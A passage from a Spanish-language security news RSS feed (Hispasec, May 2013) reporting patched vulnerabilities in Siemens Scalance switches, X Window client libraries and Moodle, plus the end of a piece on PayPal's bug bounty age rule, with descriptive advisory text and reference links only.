El investigador de seguridad informática es habitualmente joven, y la experiencia demuestra que suele elucubrar sus mejores ideas o potenciar sus habilidades durante su adolescencia. Imponer una restricción de edad como si la "inmadurez legal" fuese un obstáculo técnico en el mundo de la seguridad, no puede más que interpretarse como una excusa por parte de la compañía y una puesta en evidencia de un programa de recompensas que, si bien ha resultado una buena idea en general para todas las empresas que lo han puesto en marcha, Paypal en concreto parece gestionar de forma discutible. O al menos, no parece que le esté otorgando el rédito en buena imagen que, como efecto colateral, también se busca con estas iniciativas.&lt;/div&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La caza de bugs en Paypal acaba con la publicación de un grave agujero de seguridad&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://unaaldia.hispasec.com/2012/11/la-caza-de-bugs-en-paypal-acaba-con-la.html"&gt;http://unaaldia.hispasec.com/2012/11/la-caza-de-bugs-en-paypal-acaba-con-la.html&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;PayPal.com XSS Vulnerability&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://seclists.org/fulldisclosure/2013/May/163"&gt;&lt;span lang="EN-GB"&gt;http://seclists.org/fulldisclosure/2013/May/163&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Boy bug hunter nabs $3,000 from Mozilla&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://news.cnet.com/8301-17852_3-20020534-71.html"&gt;&lt;span lang="EN-GB"&gt;http://news.cnet.com/8301-17852_3-20020534-71.html&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Teen finds bugs in Google, Facebook, Apple, Microsoft code&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://news.cnet.com/8301-27080_3-57369971-245/teen-finds-bugs-in-google-facebook-apple-microsoft-code/"&gt;&lt;span lang="EN-GB"&gt;http://news.cnet.com/8301-27080_3-57369971-245/teen-finds-bugs-in-google-facebook-apple-microsoft-code/&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Sergio de los Santos&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:ssantos@hispasec.com"&gt;ssantos@hispasec.com&lt;/a&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Twitter: &lt;a href="http://www.twitter.com/ssantosv"&gt;@ssantosv&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/UKZYxe_i5i4" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/UKZYxe_i5i4/paypal-no-paga-por-un-fallo-de.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-iYh-72_U68k/UaTiqT-zczI/AAAAAAAACkI/9Nb01xecfYI/s72-c/xss-paypal.png" height="72" width="72" /><thr:total>14</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/05/paypal-no-paga-por-un-fallo-de.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-2645655774449538214</guid><pubDate>Tue, 28 May 2013 16:56:00 +0000</pubDate><atom:updated>2013-05-29T08:44:37.205+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">firmware</category><category domain="http://www.blogger.com/atom/ns#">Hardware</category><category domain="http://www.blogger.com/atom/ns#">Siemens</category><category domain="http://www.blogger.com/atom/ns#">Scalance</category><title>Salto de restricciones en switches Siemens Scalance X-200 IRT</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: 13.0pt;"&gt;Dos vulnerabilidades en el firmware de los switches Siemens Scalance de la serie X-200 IRT&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt; (usados en entornos SCADA) &lt;a href="http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-170686.pdf"&gt;podrían permitir eludir restricciones de seguridad de forma remota.&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-99BNrUiSTAc/UaThgkuJ5SI/AAAAAAAACj4/LJPdzsyoHpI/s1600/Siemens_SCALANCE_X200-4P_IRT.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-99BNrUiSTAc/UaThgkuJ5SI/AAAAAAAACj4/LJPdzsyoHpI/s320/Siemens_SCALANCE_X200-4P_IRT.png" width="182" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Siemen&amp;nbsp;&lt;span style="font-size: small; text-align: justify;"&gt;Scalance X-200-4P IRT&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="https://eb.automation.siemens.com/mall/es/WW/Catalog/Products/10139824"&gt;Los switches Siemens Scalance de la familia X-200 IRT&lt;/a&gt; son utilizados en redes industriales para conectar componentes tales como PLCs y HMIs. Además la serie IRT (Isochronous Real-Time) es recomendada para satisfacer las exigencias en cuanto al tiempo real. Disponen de una interfaz web de administración para facilitar su gestión y cuentan con funciones de diagnóstico remoto estándar (SNMP).&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Siemens ha publicado un boletín de seguridad que corrige dos vulnerabilidades en los switches Scalance. La primera de ellas se debe a un error de falta de comprobación de privilegios de usuario de la interfaz web en el lado del servidor. Esto podría ser aprovechado por un atacante remoto autenticado para elevar sus privilegios y ejecutar comandos. Esta vulnerabilidad ha sido identificada como CVE-2013-3633.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La segunda vulnerabilidad se debe a un fallo en la implementación del protocolo SNMPv3 al no validar los credenciales del usuario correctamente, lo que podría permitir a un atacante remoto ejecutar comandos SNMP sin estar autenticado. El identificador de esta vulnerabilidad es CVE-2013-3634.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Se encuentran afectados los siguientes switches:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Scalance X-200-4P IRT&lt;/li&gt;
&lt;li&gt;Scalance X-201-3P IRT&lt;/li&gt;
&lt;li&gt;Scalance X-201-3P IRT PRO&lt;/li&gt;
&lt;li&gt;Scalance X-202-2IRT&lt;/li&gt;
&lt;li&gt;Scalance X-202-2P IRT&lt;/li&gt;
&lt;li&gt;Scalance X-202-2P IRT PRO&lt;/li&gt;
&lt;li&gt;Scalance X-204IRT&lt;/li&gt;
&lt;li&gt;Scalance X-204IRT PRO&lt;/li&gt;
&lt;li&gt;Scalance XF-204IRT&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Siemens ha publicado una actualización de firmware,&lt;/b&gt; la versión 5.1.0, que corrige ambos errores. Está disponible para su descarga en la página oficial.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;o:p&gt;&amp;nbsp;&lt;/o:p&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
SSA-170686: Vulnerabilities in Siemens Scalance X200 IRT Switch family&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-170686.pdf"&gt;http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-170686.pdf&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Siemens Industry Online Support&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://support.automation.siemens.com/WW/view/en/73470284"&gt;&lt;span lang="EN-GB"&gt;http://support.automation.siemens.com/WW/view/en/73470284&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Juan José Ruiz&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:jruiz@hispasec.com"&gt;jruiz@hispasec.com&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/50ISlORb2oU" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/50ISlORb2oU/salto-de-restricciones-en-switches.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-99BNrUiSTAc/UaThgkuJ5SI/AAAAAAAACj4/LJPdzsyoHpI/s72-c/Siemens_SCALANCE_X200-4P_IRT.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/05/salto-de-restricciones-en-switches.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-7574013013753519419</guid><pubDate>Mon, 27 May 2013 08:25:00 +0000</pubDate><atom:updated>2013-05-28T12:08:49.950+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">X Window</category><title>Actualización de seguridad para X Window corrige 29 vulnerabilidades</title><description>&lt;br /&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13pt;"&gt;Ilja
van Sprundel, un investigador de seguridad de IOActive ha descubierto &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;varios problemas de seguridad en las
librerías del cliente X de X Window&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt;, un total de 29 vulnerabilidades en 22
librerías.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-yOxO6uSxkSc/UaRqcjU2_AI/AAAAAAAACjo/yzaHoPg5xfI/s1600/X_Window.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-yOxO6uSxkSc/UaRqcjU2_AI/AAAAAAAACjo/yzaHoPg5xfI/s320/X_Window.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
X Window es un software que se
utiliza para dotar de una interfaz gráfica a los sistemas Unix. X Window
contiene una parte servidor (X Server) encargada de acceder a los recursos de
hardware (pantalla, teclado, etc..) y una parte de cliente (X client) que se
encarga de interactuar con el usuario.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Los errores son producidos por
una "&lt;i&gt;confianza&lt;/i&gt;" de los
valores que deben de ser retornados por el servidor en la comunicación entre el
cliente y servidor X. Se han visto afectadas 22 librerías (de tres proyectos diferentes)
que son las siguientes:&amp;nbsp; libX11, libXcursor,
libXext, libXfixes, libXi, libXinerama, libXp, libXrandr, libXrender, libXRes, libXtst,
libXv, libXvMC, libXxf86dga, libXxf86vm, libdmx, libxcb, libFS, libXt del
proyecto X.Org, las librerías libchromeXvMC y libchromeXvMCPro del proyecto
openChrome y la librería libGLX del proyecto Mesa.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Las vulnerabilidades han sido
identificadas desde el CVE-2013-1981 hasta el CVE-2013-2005 y desde el
CVE-2013-2062 hasta CVE-2013-2066. Algunos detalles de las vulnerabilidades
son:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;17 desbordamientos de entero
causados por un error al calcular la memoria necesaria para almacenar el valor
retornado por una función. Afecta a total de 17 librerías, todas exceptuando
las librerías '&lt;i&gt;libXcursor&lt;/i&gt;', '&lt;i&gt;libXxf86vm&lt;/i&gt;', '&lt;i&gt;libFS&lt;/i&gt;', '&lt;i&gt;libXt&lt;/i&gt;', '&lt;i&gt;libXt&lt;/i&gt;', afectando a un total de 54
funciones.&lt;br /&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Un error de signo causado por
un fallo al calcular la memoria necesaria para almacenar el valor retornado por
una función. Se ven afectadas las librerías 'libXi' y '&lt;i&gt;libFS&lt;/i&gt;' en una función cada librería.&lt;br /&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;7 desbordamientos de memoria intermedia
causados por una falta de validación de la cantidad de memoria necesaria para
almacenar el valor retornado por una función. Afecta a la librerías '&lt;i&gt;libX11&lt;/i&gt;', '&lt;i&gt;libXi&lt;/i&gt;', '&lt;i&gt;libXv&lt;/i&gt;', '&lt;i&gt;libXvMC&lt;/i&gt;', '&lt;i&gt;libXxf86dga&lt;/i&gt;', '&lt;i&gt;libXxf86vm&lt;/i&gt;'
y '&lt;i&gt;libXt&lt;/i&gt;' afectando a un total de 24
funciones.&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/li&gt;
&lt;li&gt;Dos desbordamiento de enteros causados por
una falta de comprobación de la cantidad de memoria necesaria para procesar los
ficheros especificados por un usuario. Afecta a las librerías '&lt;i&gt;libX11&lt;/i&gt;' y '&lt;i&gt;libXcursor&lt;/i&gt;' en 6 funciones.&lt;br /&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Un error por una falta de
límites en la recursión en el procesamiento de los ficheros especificados por
un usuario. Afecta a la librería '&lt;i&gt;libX11&lt;/i&gt;'
en dos funciones.&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/li&gt;
&lt;li&gt;Una corrupción de memoria
causada por una falta de validación de la cantidad de memoria necesaria para
almacenar el valor retornado por una función. Afecta a la librería '&lt;i&gt;libXt&lt;/i&gt;' en un total de cinco funciones.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;






















&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Las vulnerabilidades ya han sido corregidas&lt;/b&gt; en las librerías correspondientes
y pueden ser descargadas desde los repositorios oficiales.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;&lt;span lang="EN-GB"&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;X.Org Security Advisory: May 23, 2013&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.x.org/wiki/Development/Security/Advisory-2013-05-23"&gt;&lt;span lang="EN-GB"&gt;http://www.x.org/wiki/Development/Security/Advisory-2013-05-23&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Openchrome&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.freedesktop.org/wiki/Openchrome/"&gt;&lt;span lang="EN-GB"&gt;http://www.freedesktop.org/wiki/Openchrome/&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;The &lt;st1:city w:st="on"&gt;&lt;st1:place w:st="on"&gt;Mesa&lt;/st1:place&gt;&lt;/st1:city&gt;
3D Graphics Library&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.mesa3d.org/"&gt;&lt;span lang="EN-GB"&gt;http://www.mesa3d.org/&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Jose Ignacio Palacios
Ortega&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:jipalacios@hispasec.com"&gt;jipalacios@hispasec.com&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/CLzdLL7qc6U" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/CLzdLL7qc6U/actualizacion-de-seguridad-para-x.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-yOxO6uSxkSc/UaRqcjU2_AI/AAAAAAAACjo/yzaHoPg5xfI/s72-c/X_Window.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/05/actualizacion-de-seguridad-para-x.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-9059433169416069462</guid><pubDate>Sun, 26 May 2013 20:08:00 +0000</pubDate><atom:updated>2013-05-28T04:44:34.979+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">moodle</category><category domain="http://www.blogger.com/atom/ns#">software</category><title>Múltiples vulnerabilidades en Moodle</title><description>&lt;br /&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13pt;"&gt;Moodle
ha publicado varios boletines de seguridad en los que corrigen un total de &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;cinco vulnerabilidades&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt;. Se ven
afectadas las versiones 2.2.9, 2.4.3 y 2.3.6 y anteriores.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-jFewBldhXa4/UA17erxySDI/AAAAAAAAAsM/wvZLljBOQTg/s1600/Moodle-logo.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="79" src="http://4.bp.blogspot.com/-jFewBldhXa4/UA17erxySDI/AAAAAAAAAsM/wvZLljBOQTg/s320/Moodle-logo.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Moodle, acrónimo de Modular
Object-Oriented Dynamic Learning Environment (en español, Entorno de
Aprendizaje Dinámico, Orientado a Objetos y Modular). Es una plataforma
educativa de código abierto escrita en PHP, que permite a los educadores crear
y gestionar tanto usuarios como cursos de modalidad e-learning. Además
proporciona herramientas para la comunicación entre formadores y alumnos.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Los boletines de seguridad van
desde MSA-13-0020 hasta el MSA-13-0024 y las vulnerabilidades que corrigen son
las identificadas como CVE-2013-1835, CVE-2013-1836, CVE-2013-2079,
CVE-2013-2080 y CVE-2013-&lt;st1:metricconverter productid="2081. A" w:st="on"&gt;2081.
 A&lt;/st1:metricconverter&gt; grandes rasgos, son las siguientes:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Un error al no limpiar
correctamente los elementos de un formulario.&lt;br /&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Una falta de validación de los
comentarios que podría permitir que los usuarios puedan ver un comentario no
permitido. &lt;br /&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Un error al manejar los sitios
de información registrados podría permitir que la información sea enviada a un
sitio aunque no esté marcada.&lt;br /&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Un error en el método '&lt;i&gt;showtotalsifcontainhidden&lt;/i&gt;' en el
generador de calificaciones podría ser aprovechado para mostrar valores
incorrectos.&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/li&gt;
&lt;li&gt;Un error al controlar las
descargar de ficheros '&lt;i&gt;zip&lt;/i&gt;' podría permitir
a un usuario descargar ficheros enviados por otros usuarios.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;


















&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Los errores han sido corregidos&lt;/b&gt; en las versiones 2.5, 2.4.4, 2.3.7
y 2.2.10 y pueden ser descargadas desde su página oficial&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Más información&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Moodle security news&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="https://moodle.org/security/"&gt;https://moodle.org/security/&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Official Moodle git projects&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://git.moodle.org/gw?p=moodle.git;a=tree;hb=refs/heads/MOODLE_25_STABLE"&gt;&lt;span lang="EN-GB"&gt;http://git.moodle.org/gw?p=moodle.git;a=tree;hb=refs/heads/MOODLE_25_STABLE&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;&amp;nbsp;&lt;/span&gt;&amp;nbsp;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Jose Ignacio Palacios
Ortega&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:jipalacios@hispasec.com"&gt;jipalacios@hispasec.com&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/9fT7frnIi8E" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/9fT7frnIi8E/multiples-vulnerabilidades-en-moodle.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-jFewBldhXa4/UA17erxySDI/AAAAAAAAAsM/wvZLljBOQTg/s72-c/Moodle-logo.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/05/multiples-vulnerabilidades-en-moodle.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-5337776396735220112</guid><pubDate>Sat, 25 May 2013 17:34:00 +0000</pubDate><atom:updated>2013-05-27T19:41:52.142+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">LG Optimus G</category><category domain="http://www.blogger.com/atom/ns#">LG</category><category domain="http://www.blogger.com/atom/ns#">teléfono</category><category domain="http://www.blogger.com/atom/ns#">smatphone</category><title>Elevación de privilegios en teléfonos LG Optimus G</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
